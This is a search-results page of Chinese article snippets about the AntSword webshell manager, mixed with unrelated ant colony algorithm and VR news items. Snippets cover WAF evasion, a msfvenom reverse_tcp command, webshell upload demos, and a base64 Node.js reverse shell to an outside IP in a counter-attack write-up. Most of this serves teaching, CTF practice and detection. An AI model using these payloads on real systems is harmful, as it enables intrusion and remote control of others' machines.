- 综合排序
- 最热优先
- 最新优先
- 来自专栏全栈程序员必看
中国蚁剑安装教程_剑形虹臭蚁的天敌
中国蚁剑: 向中国菜刀致敬! 中国蚁剑:一款跨平台的开源网站管理工具 github地址: 蚁剑源代码 https://github.com/AntSwordProject 蚁剑加载器 https://github.com/AntSwordProject 46,售后保障稳定 安装教程: 两个全部解压好(一个是源码,一个是启动文件/加载器) 先打开 AntSword-Loader-x64(加载器)文件夹里面的 AntSword.exe 点击初始化(选择蚁剑工作目录
3.2K40编辑于 2022-11-01 - 来自专栏博客原创文章
蚁剑从安装到卸载
在专业的网站管理软件中,"中国菜刀"早已是神话,中国菜刀简单好用,安装也没什么难度,会解压就行了,如果不会的话,附上一个解决方法: 正文开始 蚁剑是一款优秀且合法还开源的跨平台网站管理软件,使用方法和 "中国菜刀"大同小异 安装 蚁剑可以在Windows,Linux,Mac OS上使用,以Windows作为示例 链接一:AntSwordProject/AntSword-Loader 链接二:https ://github.com/AntSwordProject/antSword 上面两个是安装蚁剑的必需品,缺一不可 第一个链接: 图一 第二个链接: 图二 安装步骤 ①在第一个链接中,往下面拖动,
2.5K20编辑于 2021-12-20 中国蚁剑 安装教程 2024年5月
2024/5/11 中国蚁剑 安装教程 一、下载中国蚁剑的加载器和核心源码(两个都要用到) github官方下载地址:https://github.com/AntSwordProject/ 参考文档:antSword 小问题: 下载中国蚁剑的核心源码时,可能因为检测到病毒无法下载,或文件被防火墙删除。 前往“Windows防护中心”–>“保护历史记录”,选择“操作”中的“还原”,就可以解决问题。
88810编辑于 2025-08-19- 来自专栏Seebug漏洞平台
404星链计划 | 蚁剑绕WAF进化图鉴
之前讲过 RSA 非对称加密请求包,那这一篇我们就来多花一些时间,详细讲一讲蚁剑的「发包方式」、「编码器」、「解码器」这几个组件的用法。 为方便解释,我们后面统一都以 PHP 为例来说,毕竟蚁剑现在支持最好的就是 PHP(实际是本穷逼买不起高配电脑,开不起虚拟机,只能在 docker 里面开一开 PHP 环境)。 3.2) base64 的兄弟姐妹 后来,蚁剑引入了 CHR、CHR16、ROT13 编码器,跟 base64 的原理一样,只是把大量的功能性代码藏了起来而已。 然后再说蚁剑解码器里,解密部分的代码: 重点已经标出来了,一定要保证算法一致性。 经过 Header 伪造、发包方式修改、编码器、解码器这一轮洗礼下来,蚁剑的流量上基本已经没有太多特征性的东西了。有攻也得有守嘛不是。那该怎么防呢?
1.4K30发布于 2021-11-17 - 来自专栏Seebug漏洞平台
404星链计划 | As-Exploits:中国蚁剑后渗透框架
项目名称:As-Exploits 项目作者:yzddmr6 项目地址: https://github.com/yzddmr6/As-Exploits 前言 冰蝎跟哥斯拉都有了各自的一些后渗透模块,然而蚁剑这一块基本还是空缺 ,所以就萌生出来做一个蚁剑的后渗透框架插件的想法。 目前插件的定位是蚁剑的一个微内核拓展模块,可以迅速做到payload的工程化,不用过多时间浪费在插件的结构上。 蚁剑没有java环境,那么是如何做到用node修改字节码的呢? test_command"] = this.form.getItemValue("test_command"); return args; } } module.exports = Test; 运行结果 重启蚁剑后再打开插件就可以使用我们的新模块了
1.4K30发布于 2021-11-26 - 来自专栏Gamma安全实验室
蚁剑改造计划之实现JSP一句话
我在前面几篇文章提到过,蚁剑一直有一个硬伤就是它对于其他参数的处理仅仅是一层base64。这就导致了不管怎么对主payload加密,WAF只要分析到其他的参数就能知道你在做什么。 即使是蚁剑编码器仓库中的aes编码器也只是对主payload加了密,防护方在不需要解密主payload的情况下只要看到其他参数传的什么内容就能推测攻击者的行为。 yan表哥曾经在公众号中的WAF拦了蚁剑发送的其它参数时怎么操作文章中给出了一种解决方案。主要思想就是在不修改主payload的情况下,配合客户端额外再把它加密解密一遍。 蚁剑这么有名的项目,一定是防火墙商眼中紧盯的目标。最好的解决办法就是加入一个用户可控的参数,能够让用户自定义修改。这样才有可能最大程度的逃过WAF的流量查杀。 修改模版前要简单了解一下蚁剑对于参数的处理流程 在各类型shell的模版文件中,会定义默认的payload以及他们所需要的参数,还有对于参数的编码方式。
3.8K40发布于 2020-12-23 - 来自专栏OneMoreThink的专栏
应急靶场(10):【玄机】流量特征分析-蚁剑流量分析
在HTTP请求体中看到明显的蚁剑webshell木马特征,连接密码是:1。 先将变量值删除前2个字符,再分别进行URL解码和Base64解码,得到蚁剑webshell木马执行的命令:cd "/var/www/html";id;echo e124bc;pwd;echo 43523 三、黑客读取了哪个文件的内容,提交文件绝对路径 点击Stream旁的上下箭头切换Stream,并逐个复制HTTP请求体中蚁剑webshell木马payload的最后一个变量值,先删除前2个字符,再分别进行 在Stream2时,变量值是mtY2QgIi92YXIvd3d3L2h0bWwiO2NhdCAvZXRjL3Bhc3N3ZDtlY2hvIGUxMjRiYztwd2Q7ZWNobyA0MzUyMw%3D 将蚁剑webshell木马的payload进行URL解码。 再进行JS美化,得到2个变量。
1.7K10编辑于 2024-10-15 - 来自专栏VRPinea
12.21 VR扫描:联想Mirage AR“光剑”头显国内开售;蚁视将推ARVR头显蚁视Mix
联想Mirage AR“光剑”头显国内开售,首发价1999元 昨日,联想在哈尔滨召开的联想创新科技大会·哈尔滨峰会上,宣布正式在国内发布联想Mirage AR“光剑”头显,首发价1999元。 用户可使用高度还原星球大战光剑的手柄,在星战的经典场景与熟悉的星战角色一决高下。 VRPinea独家点评:国内售价比国外售价高了好几百元呢! 蚁视将推AR/VR头显蚁视Mix 据悉,蚁视将推出一款AR/VR头显蚁视 Mix。该头显的具体技术参数还未曝光,不过据蚁视方面透露,蚁视Mix采用了其独家专利,自主研发的光机。 蚁视 Mix 将在Kickstarter上开启众筹,此外,蚁视Mix DK版和蚁视Mix ONE样机将亮相CES 2018。
89650发布于 2018-05-17 - 来自专栏E=mc²
文件上传漏洞演示(一句话木马文件 + 蚁剑)
▌漏洞描述 文件上传未做校验,可以上传木马文件到服务器上,从而获取服务器控制权限 ▌演示环境 本地搭建的测试环境 dvwa burpsuite等抓包工具 蚁剑等shell管理工具 ▌演示过程详解 ➊ ➑使用工具,像上一步那样一步一步操作效率太低了,所以用到了蚁剑shell管理工具 操作如下,填写添加url(第⑤上传的shell.php文件路径)http://172.16.152.132/DVWA-master ➒已经获取了web的权限,可以使用蚁剑的其它功能做更多的操作 ?
11.7K62发布于 2020-08-17 - 来自专栏数据科学CLUB
蚁群算法
核心思想 蚁群觅食过程中,每只蚂蚁在所走过的路径上均会释放出一种信息素,该信息素随时间的推移逐渐挥发。因此,每条路径上的信息素同时存在正负反馈两种机制。 因此,在理想情况下,整个蚁群将逐渐向信息素浓度最高的路径(即最短路径)进行转移。 self.path.append(B) self.path[-1], self.path[-2] = self.path[-2], self.path[-1] # 构建“蚁群算法 beta=5, rho=0.1, Q=1): self.ants_num = ant_num # 蚂蚁个数 self.maxIter = maxIter # 蚁群最大迭代次数 # 记录每次迭代后所有蚂蚁的路径长度信息 self.best_path = np.zeros(self.maxIter) # 记录每次迭代后整个蚁群的
1.5K40发布于 2020-06-12 - 来自专栏一名白帽的成长史
【实战篇】记一次蚁剑无文件连接phpstudy后门
使用蚁剑进行连接,密码为上面的123: ? 添加请求头字段,发送一句话木马: ? 连接成功: ? 溯源分析 翻找本地文件,可以找到大量作案工具: ? 以及定点进行的信息收集: ?
2.2K20发布于 2021-05-13 - 来自专栏小白VREP
蚁群算法
算法背景及原理 蚁群算法是一种智能优化算法,在TSP商旅问题上得到广泛使用。蚁群算法于1992年由Marco Dorigo首次提出,该算法来源于蚂蚁觅食行为。 算法应用 蚁群算法被应用于数据分析、机器人协作求解、电力、通信、水利、交通、建筑等领域。 信息素因子 表示蚂蚁运动过程中路径上积累的信息素的量在指导蚁群搜索中的相对重要程度。 启发函数因子 表示启发式信息在指导蚁群搜索过程中的相对重要程度。如果该参数设置过大,会使收敛速度加快,但是容易陷入局部最优;如果该参数设置过小,会导致蚁群搜索随机性变大,很难找到最优解。 新增信息素含量根据不同规则可以将蚁群算法分为以下三种模型,分别是蚁周模型、蚁量模型以及蚁密模型,具体大家可根据需要进行学习。
2.7K20编辑于 2022-05-30 - 来自专栏Cyber Security
【应急响应】战中溯源反制&对抗上线CS&Goby&蚁剑&Sqlmap等安全工具
溯源反制-Webshell工具-Antsword 蓝队通过修改后门的代码实现获得蚁剑使用者的权限 正常情况下,PHP后门上线 发现PHP后门,修改webshell进行反制 复现环境: 蓝队:Linux php header('HTTP/1.1 500
'); 这里说明一下,最新版本的剑蚁已经不支持了 测试版本是2.0.7 最新版本为2.1.15 Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMTIyLCAiNDcuOTQuMTMwLjQyIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTtzaC5zdGRlcnIucGlwZShjbGllbnQpO30pOw
51710编辑于 2024-07-18 - 来自专栏前端F2E
剑指Offer题解 - Day7
「剑指 Offer 53 - II. 0 ~ n-1 中缺失的数字」 力扣题目链接[1] 一个长度为 n-1 的递增排序数组中的所有数字都是唯一的,并且每个数字都在范围 0 ~ n-1 之内。 示例 1: 输入: [0,1,3] 输出: 2 示例 2: 输入: [0,1,2,3,4,5,6,7,9] 输出: 8 「限制:」 1 <= 数组长度 <= 10000 思路: 首先考虑暴利破解。
30510编辑于 2022-08-19 - 来自专栏mwangblog
蚁群算法简单介绍
蚁群算法的基本原理 蚁群算法(Ant Colony Optimization, ACO)是通过模拟蚂蚁觅食的原理,设计出的一种群集智能算法。 蚁群算法的重要原则 避障原则,蚂蚁不能穿过障碍物。 播发信息素规则,蚁群在刚离开窝或者事物附近播散的信息素最多。 范围,蚂蚁只能感知到自己周围的环境。
1.9K20发布于 2018-12-06 - 来自专栏智能算法
蚁群算法详解
本文我们一起学下常用于路径优化的蚁群算法,主要内容如下: 蚁群算法简介 蚁群算法原理 蚁群算法实例 1.蚁群算法简介 如何寻找一条合适的路径,几乎是一个永恒的话题。每个人、每天都会遇到。 他们在研究蚂蚁觅食的过程中,发现蚁群整体会体现一些智能的行为,例如蚁群可以在不同的环境下,寻找最短到达食物源的路径。 ? 2.蚁群算法原理 蚁群算法是从自然界中真实蚂蚁觅食的群体行为得到启发而提出的,其很多观点都来源于真实蚁群,因此算法中所定义的人工蚂蚁与真实蚂蚁存在一定的辩证关系。 自组织行为特征 蚁群的自组织行为特征主要有: 高度结构化的组织 虽然蚂蚁的个体行为极其简单,但由个体组成的蚁群却构成高度结构化的社会组织,蚂蚁社会的成员有分工,有相互的通信和信息传递。 至此,我们从蚁群算法的简介,原理以及实例方面对蚁群算法进行了详细的阐述,希望对大家有所帮助。 ♥点个赞再走呗♥
7.4K92发布于 2020-09-24 - 来自专栏ly0n
Vulnstack 内网渗透(一)
环境介绍 攻击机为kali和win7的外网ip为同一网段 ? 环境搭建过程就不在过多解释,可以看图理解 信息收集 我们拿到ip之后先nmap收集一波,可以查看出开放的端口和服务 ? 使用蚁剑连接 ? getshell 后发现在根目录下存在yxcms 访问目录 根据前台提供信息能够进入后台管理页面 ? 然后蚁剑连接 初探内网 蚁剑连接后开始进行下一步的操作 发现是admin权限的用户 ? -p windows/meterpreter/reverse_tcp LHOST=192.168.110.129 LPORT=9999 -f exe -o /home/ly0n/ly0n.exe 通过蚁剑上传到目标机器 利用蚁剑运行 在kali 设置监听得到会话 ?
89030发布于 2021-04-22 - 来自专栏计算机工具
集群,蚁群算法简介
分布式与集群的区别 为了让厨师专心炒菜,把菜做到极致,又请了个配菜师负责切菜,备菜,备料,厨师和配菜师的关系是分布式,一个配菜师也忙不过来了,又请了个配菜师,两个配菜师关系是集群; 分布式:不同活 集群:同一种活 蚁群算法 将蚁群算法应用于解决优化问题的基本思路为:用蚂蚁的行走路径表示待优化问题的可行解,整个蚂蚁群体的所有路径构成待优化问题的解空间。 两者的巧妙结合使智能行为涌现,如果多样性过剩,系统过于活跃,会导致过多的随机运动,陷入混沌状态;如果多样性不够,正反馈过强,会导致僵化,当环境变化时蚁群不能相应调整。 【数之道 04】解决最优路径问题的妙招-蚁群ACO算法_哔哩哔哩_bilibili
27310编辑于 2024-12-17 - 来自专栏历史专栏
【愚公系列】2022年01月 攻防世界-进阶题-WEB-013(upload1)
文章目录 一、upload1 二、使用步骤 1.点击获取在线场景 2.场景分析 2.中国蚁剑 总结 一、upload1 题目链接:https://adworld.xctf.org.cn/task/task_list > 发现上传按钮不可用了,按F12查看源代码 把 disabled删了就可以上传文件,上传成功 2.中国蚁剑 发现html文件夹下有flag.php文件 打开flag.php 文件 得到flag:cyberpeace{10802345813d5a2e2c26fc5f62b3e7aa} 总结 php木马文件 前端改写源码(或者用burpsuit进行后缀改写) 中国蚁剑
45420编辑于 2022-01-29 - 来自专栏世荣的博客
常见的WebShell客户端的流量特征及检测思路
蚁剑:一种常见的WebShell客户端。 2.中国蚁剑 蚁剑的很多源码来自菜刀,所以链接流量特征与中国菜刀很相似,但是蚁剑的扩充性很好可以对进行加密,混淆等绕过处理。蚁剑默认支持ASP以及PHP的webshell链接。 ","0"); 这段代码基本是所有WebShell客户端链接PHP类WebShell都有的一段代码,但是别的会加密,但是蚁剑是明文,所以较好区分。 2.3蚁剑绕过特征流量 由于蚁剑包含了很多加密,绕过插件,所以导致很多流量被加密后无法识别,但是蚁剑混淆加密后还有一个比较明显的特征,即为参数名大多以:"_0x...... ="这种形式 所以,以0_x开头的参数名,后面为加密数据的数据包也可以识别为蚁剑的流量特征。
4.4K21编辑于 2022-03-21
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号